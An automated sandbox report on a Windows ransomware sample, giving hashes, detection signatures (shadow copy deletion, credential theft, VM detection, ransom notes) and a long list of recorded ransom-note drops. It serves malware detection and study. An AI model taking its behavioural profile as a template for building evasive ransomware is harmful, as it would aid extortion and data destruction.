Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2b7cu0KwZl.exe

Overview

General Information

Sample name:2b7cu0KwZl.exe
renamed because original name is a hash value
Original sample name:e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Analysis ID:1548500
MD5:0d7e80ec85db5cb45642235cb2381a0c
SHA1:f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256:e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
Tags:193-143-1-139exeuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Infects executable files (exe, dll, sys, html)
Modifies existing user documents (likely ransomware behavior)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Enables debug privileges
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • 2b7cu0KwZl.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\2b7cu0KwZl.exe" MD5: 0D7E80EC85DB5CB45642235CB2381A0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-04T15:21:29.172717+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449737TCP
2024-11-04T15:22:08.641719+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449772TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 2b7cu0KwZl.exeReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_459c71e0-4
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\fr-fr\RECOVERY INFO.txtJump to behavior
